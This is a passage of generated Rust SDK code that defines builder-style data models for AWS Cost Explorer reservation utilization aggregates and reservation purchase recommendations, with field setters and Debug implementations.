/// <p>The total number of Amazon EC2 reservation hours that you used. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub fn total_actual_units(mut self, input: impl Into<std::string::String>) -> Self {
self.total_actual_units = Some(input.into());
self
}
pub fn set_total_actual_units(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_actual_units = input;
self
}
/// <p>The number of reservation hours that you didn't use.</p>
pub fn unused_hours(mut self, input: impl Into<std::string::String>) -> Self {
self.unused_hours = Some(input.into());
self
}
pub fn set_unused_hours(mut self, input: std::option::Option<std::string::String>) -> Self {
self.unused_hours = input;
self
}
/// <p>The number of Amazon EC2 reservation hours that you didn't use. It's converted to
/// normalized units. Normalized units are available only for Amazon EC2 usage after
/// November 11, 2017.</p>
pub fn unused_units(mut self, input: impl Into<std::string::String>) -> Self {
self.unused_units = Some(input.into());
self
}
pub fn set_unused_units(mut self, input: std::option::Option<std::string::String>) -> Self {
self.unused_units = input;
self
}
/// <p>How much your reservation costs if charged On-Demand rates.</p>
pub fn on_demand_cost_of_ri_hours_used(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.on_demand_cost_of_ri_hours_used = Some(input.into());
self
}
pub fn set_on_demand_cost_of_ri_hours_used(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.on_demand_cost_of_ri_hours_used = input;
self
}
/// <p>How much you saved due to purchasing and utilizing reservation. Amazon Web Services
/// calculates this by subtracting <code>TotalAmortizedFee</code> from
/// <code>OnDemandCostOfRIHoursUsed</code>.</p>
pub fn net_ri_savings(mut self, input: impl Into<std::string::String>) -> Self {
self.net_ri_savings = Some(input.into());
self
}
pub fn set_net_ri_savings(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.net_ri_savings = input;
self
}
/// <p>How much you might save if you use your entire reservation.</p>
pub fn total_potential_ri_savings(mut self, input: impl Into<std::string::String>) -> Self {
self.total_potential_ri_savings = Some(input.into());
self
}
pub fn set_total_potential_ri_savings(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_potential_ri_savings = input;
self
}
/// <p>The upfront cost of your reservation. It's amortized over the reservation
/// period.</p>
pub fn amortized_upfront_fee(mut self, input: impl Into<std::string::String>) -> Self {
self.amortized_upfront_fee = Some(input.into());
self
}
pub fn set_amortized_upfront_fee(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.amortized_upfront_fee = input;
self
}
/// <p>The monthly cost of your reservation. It's amortized over the reservation
/// period.</p>
pub fn amortized_recurring_fee(mut self, input: impl Into<std::string::String>) -> Self {
self.amortized_recurring_fee = Some(input.into());
self
}
pub fn set_amortized_recurring_fee(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.amortized_recurring_fee = input;
self
}
/// <p>The total cost of your reservation. It's amortized over the reservation period.</p>
pub fn total_amortized_fee(mut self, input: impl Into<std::string::String>) -> Self {
self.total_amortized_fee = Some(input.into());
self
}
pub fn set_total_amortized_fee(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_amortized_fee = input;
self
}
/// <p>The cost of unused hours for your reservation.</p>
pub fn ri_cost_for_unused_hours(mut self, input: impl Into<std::string::String>) -> Self {
self.ri_cost_for_unused_hours = Some(input.into());
self
}
pub fn set_ri_cost_for_unused_hours(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.ri_cost_for_unused_hours = input;
self
}
/// <p>The realized savings because of purchasing and using a reservation.</p>
pub fn realized_savings(mut self, input: impl Into<std::string::String>) -> Self {
self.realized_savings = Some(input.into());
self
}
pub fn set_realized_savings(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.realized_savings = input;
self
}
/// <p>The unrealized savings because of purchasing and using a reservation.</p>
pub fn unrealized_savings(mut self, input: impl Into<std::string::String>) -> Self {
self.unrealized_savings = Some(input.into());
self
}
pub fn set_unrealized_savings(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.unrealized_savings = input;
self
}
/// Consumes the builder and constructs a [`ReservationAggregates`](crate::model::ReservationAggregates)
pub fn build(self) -> crate::model::ReservationAggregates {
crate::model::ReservationAggregates {
utilization_percentage: self.utilization_percentage,
utilization_percentage_in_units: self.utilization_percentage_in_units,
purchased_hours: self.purchased_hours,
purchased_units: self.purchased_units,
total_actual_hours: self.total_actual_hours,
total_actual_units: self.total_actual_units,
unused_hours: self.unused_hours,
unused_units: self.unused_units,
on_demand_cost_of_ri_hours_used: self.on_demand_cost_of_ri_hours_used,
net_ri_savings: self.net_ri_savings,
total_potential_ri_savings: self.total_potential_ri_savings,
amortized_upfront_fee: self.amortized_upfront_fee,
amortized_recurring_fee: self.amortized_recurring_fee,
total_amortized_fee: self.total_amortized_fee,
ri_cost_for_unused_hours: self.ri_cost_for_unused_hours,
realized_savings: self.realized_savings,
unrealized_savings: self.unrealized_savings,
}
}
}
}
impl ReservationAggregates {
/// Creates a new builder-style object to manufacture [`ReservationAggregates`](crate::model::ReservationAggregates)
pub fn builder() -> crate::model::reservation_aggregates::Builder {
crate::model::reservation_aggregates::Builder::default()
}
}
/// <p>The amount of utilization, in hours.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct UtilizationByTime {
/// <p>The period of time that this utilization was used for.</p>
pub time_period: std::option::Option<crate::model::DateInterval>,
/// <p>The groups that this utilization result uses.</p>
pub groups: std::option::Option<std::vec::Vec<crate::model::ReservationUtilizationGroup>>,
/// <p>The total number of reservation hours that were used.</p>
pub total: std::option::Option<crate::model::ReservationAggregates>,
}
impl std::fmt::Debug for UtilizationByTime {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("UtilizationByTime");
formatter.field("time_period", &self.time_period);
formatter.field("groups", &self.groups);
formatter.field("total", &self.total);
formatter.finish()
}
}
/// See [`UtilizationByTime`](crate::model::UtilizationByTime)
pub mod utilization_by_time {
/// A builder for [`UtilizationByTime`](crate::model::UtilizationByTime)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
pub(crate) groups:
std::option::Option<std::vec::Vec<crate::model::ReservationUtilizationGroup>>,
pub(crate) total: std::option::Option<crate::model::ReservationAggregates>,
}
impl Builder {
/// <p>The period of time that this utilization was used for.</p>
pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
self.time_period = Some(input);
self
}
pub fn set_time_period(
mut self,
input: std::option::Option<crate::model::DateInterval>,
) -> Self {
self.time_period = input;
self
}
pub fn groups(
mut self,
input: impl Into<crate::model::ReservationUtilizationGroup>,
) -> Self {
let mut v = self.groups.unwrap_or_default();
v.push(input.into());
self.groups = Some(v);
self
}
pub fn set_groups(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::ReservationUtilizationGroup>>,
) -> Self {
self.groups = input;
self
}
/// <p>The total number of reservation hours that were used.</p>
pub fn total(mut self, input: crate::model::ReservationAggregates) -> Self {
self.total = Some(input);
self
}
pub fn set_total(
mut self,
input: std::option::Option<crate::model::ReservationAggregates>,
) -> Self {
self.total = input;
self
}
/// Consumes the builder and constructs a [`UtilizationByTime`](crate::model::UtilizationByTime)
pub fn build(self) -> crate::model::UtilizationByTime {
crate::model::UtilizationByTime {
time_period: self.time_period,
groups: self.groups,
total: self.total,
}
}
}
}
impl UtilizationByTime {
/// Creates a new builder-style object to manufacture [`UtilizationByTime`](crate::model::UtilizationByTime)
pub fn builder() -> crate::model::utilization_by_time::Builder {
crate::model::utilization_by_time::Builder::default()
}
}
/// <p>A group of reservations that share a set of attributes.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationUtilizationGroup {
/// <p>The key for a specific reservation attribute.</p>
pub key: std::option::Option<std::string::String>,
/// <p>The value of a specific reservation attribute.</p>
pub value: std::option::Option<std::string::String>,
/// <p>The attributes for this group of reservations.</p>
pub attributes:
std::option::Option<std::collections::HashMap<std::string::String, std::string::String>>,
/// <p>How much you used this group of reservations.</p>
pub utilization: std::option::Option<crate::model::ReservationAggregates>,
}
impl std::fmt::Debug for ReservationUtilizationGroup {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ReservationUtilizationGroup");
formatter.field("key", &self.key);
formatter.field("value", &self.value);
formatter.field("attributes", &self.attributes);
formatter.field("utilization", &self.utilization);
formatter.finish()
}
}
/// See [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
pub mod reservation_utilization_group {
/// A builder for [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) key: std::option::Option<std::string::String>,
pub(crate) value: std::option::Option<std::string::String>,
pub(crate) attributes: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
pub(crate) utilization: std::option::Option<crate::model::ReservationAggregates>,
}
impl Builder {
/// <p>The key for a specific reservation attribute.</p>
pub fn key(mut self, input: impl Into<std::string::String>) -> Self {
self.key = Some(input.into());
self
}
pub fn set_key(mut self, input: std::option::Option<std::string::String>) -> Self {
self.key = input;
self
}
/// <p>The value of a specific reservation attribute.</p>
pub fn value(mut self, input: impl Into<std::string::String>) -> Self {
self.value = Some(input.into());
self
}
pub fn set_value(mut self, input: std::option::Option<std::string::String>) -> Self {
self.value = input;
self
}
pub fn attributes(
mut self,
k: impl Into<std::string::String>,
v: impl Into<std::string::String>,
) -> Self {
let mut hash_map = self.attributes.unwrap_or_default();
hash_map.insert(k.into(), v.into());
self.attributes = Some(hash_map);
self
}
pub fn set_attributes(
mut self,
input: std::option::Option<
std::collections::HashMap<std::string::String, std::string::String>,
>,
) -> Self {
self.attributes = input;
self
}
/// <p>How much you used this group of reservations.</p>
pub fn utilization(mut self, input: crate::model::ReservationAggregates) -> Self {
self.utilization = Some(input);
self
}
pub fn set_utilization(
mut self,
input: std::option::Option<crate::model::ReservationAggregates>,
) -> Self {
self.utilization = input;
self
}
/// Consumes the builder and constructs a [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
pub fn build(self) -> crate::model::ReservationUtilizationGroup {
crate::model::ReservationUtilizationGroup {
key: self.key,
value: self.value,
attributes: self.attributes,
utilization: self.utilization,
}
}
}
}
impl ReservationUtilizationGroup {
/// Creates a new builder-style object to manufacture [`ReservationUtilizationGroup`](crate::model::ReservationUtilizationGroup)
pub fn builder() -> crate::model::reservation_utilization_group::Builder {
crate::model::reservation_utilization_group::Builder::default()
}
}
/// <p>A specific reservation that Amazon Web Services recommends for purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendation {
/// <p>The account scope that Amazon Web Services recommends that you purchase this instance
/// for. For example, you can purchase this reservation for an entire organization in
/// Amazon Web Services Organizations.</p>
pub account_scope: std::option::Option<crate::model::AccountScope>,
/// <p>How many days of previous usage that Amazon Web Services considers when making this
/// recommendation.</p>
pub lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
/// <p>The term of the reservation that you want recommendations for, in years.</p>
pub term_in_years: std::option::Option<crate::model::TermInYears>,
/// <p>The payment option for the reservation (for example, <code>AllUpfront</code> or
/// <code>NoUpfront</code>).</p>
pub payment_option: std::option::Option<crate::model::PaymentOption>,
/// <p>Hardware specifications for the service that you want recommendations for.</p>
pub service_specification: std::option::Option<crate::model::ServiceSpecification>,
/// <p>Details about the recommended purchases.</p>
pub recommendation_details:
std::option::Option<std::vec::Vec<crate::model::ReservationPurchaseRecommendationDetail>>,
/// <p>A summary about the recommended purchase.</p>
pub recommendation_summary:
std::option::Option<crate::model::ReservationPurchaseRecommendationSummary>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendation {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ReservationPurchaseRecommendation");
formatter.field("account_scope", &self.account_scope);
formatter.field("lookback_period_in_days", &self.lookback_period_in_days);
formatter.field("term_in_years", &self.term_in_years);
formatter.field("payment_option", &self.payment_option);
formatter.field("service_specification", &self.service_specification);
formatter.field("recommendation_details", &self.recommendation_details);
formatter.field("recommendation_summary", &self.recommendation_summary);
formatter.finish()
}
}
/// See [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
pub mod reservation_purchase_recommendation {
/// A builder for [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) account_scope: std::option::Option<crate::model::AccountScope>,
pub(crate) lookback_period_in_days: std::option::Option<crate::model::LookbackPeriodInDays>,
pub(crate) term_in_years: std::option::Option<crate::model::TermInYears>,
pub(crate) payment_option: std::option::Option<crate::model::PaymentOption>,
pub(crate) service_specification: std::option::Option<crate::model::ServiceSpecification>,
pub(crate) recommendation_details: std::option::Option<
std::vec::Vec<crate::model::ReservationPurchaseRecommendationDetail>,
>,
pub(crate) recommendation_summary:
std::option::Option<crate::model::ReservationPurchaseRecommendationSummary>,
}
impl Builder {
/// <p>The account scope that Amazon Web Services recommends that you purchase this instance
/// for. For example, you can purchase this reservation for an entire organization in
/// Amazon Web Services Organizations.</p>
pub fn account_scope(mut self, input: crate::model::AccountScope) -> Self {
self.account_scope = Some(input);
self
}
pub fn set_account_scope(
mut self,
input: std::option::Option<crate::model::AccountScope>,
) -> Self {
self.account_scope = input;
self
}
/// <p>How many days of previous usage that Amazon Web Services considers when making this
/// recommendation.</p>
pub fn lookback_period_in_days(
mut self,
input: crate::model::LookbackPeriodInDays,
) -> Self {
self.lookback_period_in_days = Some(input);
self
}
pub fn set_lookback_period_in_days(
mut self,
input: std::option::Option<crate::model::LookbackPeriodInDays>,
) -> Self {
self.lookback_period_in_days = input;
self
}
/// <p>The term of the reservation that you want recommendations for, in years.</p>
pub fn term_in_years(mut self, input: crate::model::TermInYears) -> Self {
self.term_in_years = Some(input);
self
}
pub fn set_term_in_years(
mut self,
input: std::option::Option<crate::model::TermInYears>,
) -> Self {
self.term_in_years = input;
self
}
/// <p>The payment option for the reservation (for example, <code>AllUpfront</code> or
/// <code>NoUpfront</code>).</p>
pub fn payment_option(mut self, input: crate::model::PaymentOption) -> Self {
self.payment_option = Some(input);
self
}
pub fn set_payment_option(
mut self,
input: std::option::Option<crate::model::PaymentOption>,
) -> Self {
self.payment_option = input;
self
}
/// <p>Hardware specifications for the service that you want recommendations for.</p>
pub fn service_specification(mut self, input: crate::model::ServiceSpecification) -> Self {
self.service_specification = Some(input);
self
}
pub fn set_service_specification(
mut self,
input: std::option::Option<crate::model::ServiceSpecification>,
) -> Self {
self.service_specification = input;
self
}
pub fn recommendation_details(
mut self,
input: impl Into<crate::model::ReservationPurchaseRecommendationDetail>,
) -> Self {
let mut v = self.recommendation_details.unwrap_or_default();
v.push(input.into());
self.recommendation_details = Some(v);
self
}
pub fn set_recommendation_details(
mut self,
input: std::option::Option<
std::vec::Vec<crate::model::ReservationPurchaseRecommendationDetail>,
>,
) -> Self {
self.recommendation_details = input;
self
}
/// <p>A summary about the recommended purchase.</p>
pub fn recommendation_summary(
mut self,
input: crate::model::ReservationPurchaseRecommendationSummary,
) -> Self {
self.recommendation_summary = Some(input);
self
}
pub fn set_recommendation_summary(
mut self,
input: std::option::Option<crate::model::ReservationPurchaseRecommendationSummary>,
) -> Self {
self.recommendation_summary = input;
self
}
/// Consumes the builder and constructs a [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
pub fn build(self) -> crate::model::ReservationPurchaseRecommendation {
crate::model::ReservationPurchaseRecommendation {
account_scope: self.account_scope,
lookback_period_in_days: self.lookback_period_in_days,
term_in_years: self.term_in_years,
payment_option: self.payment_option,
service_specification: self.service_specification,
recommendation_details: self.recommendation_details,
recommendation_summary: self.recommendation_summary,
}
}
}
}
impl ReservationPurchaseRecommendation {
/// Creates a new builder-style object to manufacture [`ReservationPurchaseRecommendation`](crate::model::ReservationPurchaseRecommendation)
pub fn builder() -> crate::model::reservation_purchase_recommendation::Builder {
crate::model::reservation_purchase_recommendation::Builder::default()
}
}
/// <p>A summary about this recommendation, such as the currency code, the amount that
/// Amazon Web Services estimates that you could save, and the total amount of
/// reservation to purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendationSummary {
/// <p>The total amount that Amazon Web Services estimates that this recommendation could save
/// you in a month.</p>
pub total_estimated_monthly_savings_amount: std::option::Option<std::string::String>,
/// <p>The total amount that Amazon Web Services estimates that this recommendation could save
/// you in a month, as a percentage of your costs.</p>
pub total_estimated_monthly_savings_percentage: std::option::Option<std::string::String>,
/// <p>The currency code used for this recommendation.</p>
pub currency_code: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendationSummary {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ReservationPurchaseRecommendationSummary");
formatter.field(
"total_estimated_monthly_savings_amount",
&self.total_estimated_monthly_savings_amount,
);
formatter.field(
"total_estimated_monthly_savings_percentage",
&self.total_estimated_monthly_savings_percentage,
);
formatter.field("currency_code", &self.currency_code);
formatter.finish()
}
}
/// See [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
pub mod reservation_purchase_recommendation_summary {
/// A builder for [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) total_estimated_monthly_savings_amount: std::option::Option<std::string::String>,
pub(crate) total_estimated_monthly_savings_percentage:
std::option::Option<std::string::String>,
pub(crate) currency_code: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The total amount that Amazon Web Services estimates that this recommendation could save
/// you in a month.</p>
pub fn total_estimated_monthly_savings_amount(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.total_estimated_monthly_savings_amount = Some(input.into());
self
}
pub fn set_total_estimated_monthly_savings_amount(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_estimated_monthly_savings_amount = input;
self
}
/// <p>The total amount that Amazon Web Services estimates that this recommendation could save
/// you in a month, as a percentage of your costs.</p>
pub fn total_estimated_monthly_savings_percentage(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.total_estimated_monthly_savings_percentage = Some(input.into());
self
}
pub fn set_total_estimated_monthly_savings_percentage(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.total_estimated_monthly_savings_percentage = input;
self
}
/// <p>The currency code used for this recommendation.</p>
pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
self.currency_code = Some(input.into());
self
}
pub fn set_currency_code(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.currency_code = input;
self
}
/// Consumes the builder and constructs a [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
pub fn build(self) -> crate::model::ReservationPurchaseRecommendationSummary {
crate::model::ReservationPurchaseRecommendationSummary {
total_estimated_monthly_savings_amount: self.total_estimated_monthly_savings_amount,
total_estimated_monthly_savings_percentage: self
.total_estimated_monthly_savings_percentage,
currency_code: self.currency_code,
}
}
}
}
impl ReservationPurchaseRecommendationSummary {
/// Creates a new builder-style object to manufacture [`ReservationPurchaseRecommendationSummary`](crate::model::ReservationPurchaseRecommendationSummary)
pub fn builder() -> crate::model::reservation_purchase_recommendation_summary::Builder {
crate::model::reservation_purchase_recommendation_summary::Builder::default()
}
}
/// <p>Details about your recommended reservation purchase.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ReservationPurchaseRecommendationDetail {
/// <p>The account that this RI recommendation is for.</p>
pub account_id: std::option::Option<std::string::String>,
/// <p>Details about the instances that Amazon Web Services recommends that you
/// purchase.</p>
pub instance_details: std::option::Option<crate::model::InstanceDetails>,
/// <p>The number of instances that Amazon Web Services recommends that you purchase.</p>
pub recommended_number_of_instances_to_purchase: std::option::Option<std::string::String>,
/// <p>The number of normalized units that Amazon Web Services recommends that you
/// purchase.</p>
pub recommended_normalized_units_to_purchase: std::option::Option<std::string::String>,
/// <p>The minimum number of instances that you used in an hour during the historical period.
/// Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub minimum_number_of_instances_used_per_hour: std::option::Option<std::string::String>,
/// <p>The minimum number of normalized units that you used in an hour during the historical
/// period. Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub minimum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
/// <p>The maximum number of instances that you used in an hour during the historical period.
/// Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub maximum_number_of_instances_used_per_hour: std::option::Option<std::string::String>,
/// <p>The maximum number of normalized units that you used in an hour during the historical
/// period. Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub maximum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
/// <p>The average number of instances that you used in an hour during the historical period.
/// Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub average_number_of_instances_used_per_hour: std::option::Option<std::string::String>,
/// <p>The average number of normalized units that you used in an hour during the historical
/// period. Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub average_normalized_units_used_per_hour: std::option::Option<std::string::String>,
/// <p>The average utilization of your instances. Amazon Web Services uses this to calculate
/// your recommended reservation purchases.</p>
pub average_utilization: std::option::Option<std::string::String>,
/// <p>How long Amazon Web Services estimates that it takes for this instance to start saving
/// you money, in months.</p>
pub estimated_break_even_in_months: std::option::Option<std::string::String>,
/// <p>The currency code that Amazon Web Services used to calculate the costs for this
/// instance.</p>
pub currency_code: std::option::Option<std::string::String>,
/// <p>How much Amazon Web Services estimates that this specific recommendation could save you
/// in a month.</p>
pub estimated_monthly_savings_amount: std::option::Option<std::string::String>,
/// <p>How much Amazon Web Services estimates that this specific recommendation could save you
/// in a month, as a percentage of your overall costs.</p>
pub estimated_monthly_savings_percentage: std::option::Option<std::string::String>,
/// <p>How much Amazon Web Services estimates that you spend on On-Demand Instances in a
/// month.</p>
pub estimated_monthly_on_demand_cost: std::option::Option<std::string::String>,
/// <p>How much Amazon Web Services estimates that you would have spent for all usage during
/// the specified historical period if you had a reservation.</p>
pub estimated_reservation_cost_for_lookback_period: std::option::Option<std::string::String>,
/// <p>How much purchasing this instance costs you upfront.</p>
pub upfront_cost: std::option::Option<std::string::String>,
/// <p>How much purchasing this instance costs you on a monthly basis.</p>
pub recurring_standard_monthly_cost: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ReservationPurchaseRecommendationDetail {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ReservationPurchaseRecommendationDetail");
formatter.field("account_id", &self.account_id);
formatter.field("instance_details", &self.instance_details);
formatter.field(
"recommended_number_of_instances_to_purchase",
&self.recommended_number_of_instances_to_purchase,
);
formatter.field(
"recommended_normalized_units_to_purchase",
&self.recommended_normalized_units_to_purchase,
);
formatter.field(
"minimum_number_of_instances_used_per_hour",
&self.minimum_number_of_instances_used_per_hour,
);
formatter.field(
"minimum_normalized_units_used_per_hour",
&self.minimum_normalized_units_used_per_hour,
);
formatter.field(
"maximum_number_of_instances_used_per_hour",
&self.maximum_number_of_instances_used_per_hour,
);
formatter.field(
"maximum_normalized_units_used_per_hour",
&self.maximum_normalized_units_used_per_hour,
);
formatter.field(
"average_number_of_instances_used_per_hour",
&self.average_number_of_instances_used_per_hour,
);
formatter.field(
"average_normalized_units_used_per_hour",
&self.average_normalized_units_used_per_hour,
);
formatter.field("average_utilization", &self.average_utilization);
formatter.field(
"estimated_break_even_in_months",
&self.estimated_break_even_in_months,
);
formatter.field("currency_code", &self.currency_code);
formatter.field(
"estimated_monthly_savings_amount",
&self.estimated_monthly_savings_amount,
);
formatter.field(
"estimated_monthly_savings_percentage",
&self.estimated_monthly_savings_percentage,
);
formatter.field(
"estimated_monthly_on_demand_cost",
&self.estimated_monthly_on_demand_cost,
);
formatter.field(
"estimated_reservation_cost_for_lookback_period",
&self.estimated_reservation_cost_for_lookback_period,
);
formatter.field("upfront_cost", &self.upfront_cost);
formatter.field(
"recurring_standard_monthly_cost",
&self.recurring_standard_monthly_cost,
);
formatter.finish()
}
}
/// See [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail)
pub mod reservation_purchase_recommendation_detail {
/// A builder for [`ReservationPurchaseRecommendationDetail`](crate::model::ReservationPurchaseRecommendationDetail)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) account_id: std::option::Option<std::string::String>,
pub(crate) instance_details: std::option::Option<crate::model::InstanceDetails>,
pub(crate) recommended_number_of_instances_to_purchase:
std::option::Option<std::string::String>,
pub(crate) recommended_normalized_units_to_purchase:
std::option::Option<std::string::String>,
pub(crate) minimum_number_of_instances_used_per_hour:
std::option::Option<std::string::String>,
pub(crate) minimum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
pub(crate) maximum_number_of_instances_used_per_hour:
std::option::Option<std::string::String>,
pub(crate) maximum_normalized_units_used_per_hour: std::option::Option<std::string::String>,
pub(crate) average_number_of_instances_used_per_hour:
std::option::Option<std::string::String>,
pub(crate) average_normalized_units_used_per_hour: std::option::Option<std::string::String>,
pub(crate) average_utilization: std::option::Option<std::string::String>,
pub(crate) estimated_break_even_in_months: std::option::Option<std::string::String>,
pub(crate) currency_code: std::option::Option<std::string::String>,
pub(crate) estimated_monthly_savings_amount: std::option::Option<std::string::String>,
pub(crate) estimated_monthly_savings_percentage: std::option::Option<std::string::String>,
pub(crate) estimated_monthly_on_demand_cost: std::option::Option<std::string::String>,
pub(crate) estimated_reservation_cost_for_lookback_period:
std::option::Option<std::string::String>,
pub(crate) upfront_cost: std::option::Option<std::string::String>,
pub(crate) recurring_standard_monthly_cost: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The account that this RI recommendation is for.</p>
pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
self.account_id = Some(input.into());
self
}
pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
self.account_id = input;
self
}
/// <p>Details about the instances that Amazon Web Services recommends that you
/// purchase.</p>
pub fn instance_details(mut self, input: crate::model::InstanceDetails) -> Self {
self.instance_details = Some(input);
self
}
pub fn set_instance_details(
mut self,
input: std::option::Option<crate::model::InstanceDetails>,
) -> Self {
self.instance_details = input;
self
}
/// <p>The number of instances that Amazon Web Services recommends that you purchase.</p>
pub fn recommended_number_of_instances_to_purchase(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.recommended_number_of_instances_to_purchase = Some(input.into());
self
}
pub fn set_recommended_number_of_instances_to_purchase(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.recommended_number_of_instances_to_purchase = input;
self
}
/// <p>The number of normalized units that Amazon Web Services recommends that you
/// purchase.</p>
pub fn recommended_normalized_units_to_purchase(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.recommended_normalized_units_to_purchase = Some(input.into());
self
}
pub fn set_recommended_normalized_units_to_purchase(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.recommended_normalized_units_to_purchase = input;
self
}
/// <p>The minimum number of instances that you used in an hour during the historical period.
/// Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub fn minimum_number_of_instances_used_per_hour(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.minimum_number_of_instances_used_per_hour = Some(input.into());
self
}
pub fn set_minimum_number_of_instances_used_per_hour(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.minimum_number_of_instances_used_per_hour = input;
self
}
/// <p>The minimum number of normalized units that you used in an hour during the historical
/// period. Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub fn minimum_normalized_units_used_per_hour(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.minimum_normalized_units_used_per_hour = Some(input.into());
self
}
pub fn set_minimum_normalized_units_used_per_hour(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.minimum_normalized_units_used_per_hour = input;
self
}
/// <p>The maximum number of instances that you used in an hour during the historical period.
/// Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub fn maximum_number_of_instances_used_per_hour(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.maximum_number_of_instances_used_per_hour = Some(input.into());
self
}
pub fn set_maximum_number_of_instances_used_per_hour(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.maximum_number_of_instances_used_per_hour = input;
self
}
/// <p>The maximum number of normalized units that you used in an hour during the historical
/// period. Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub fn maximum_normalized_units_used_per_hour(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.maximum_normalized_units_used_per_hour = Some(input.into());
self
}
pub fn set_maximum_normalized_units_used_per_hour(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.maximum_normalized_units_used_per_hour = input;
self
}
/// <p>The average number of instances that you used in an hour during the historical period.
/// Amazon Web Services uses this to calculate your recommended reservation
/// purchases.</p>
pub fn average_number_of_instances_used_per_hour(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.average_number_of_instances_used_per_hour = Some(input.into());
self
}
pub fn set_average_number_of_instances_used_per_hour(
mut self,
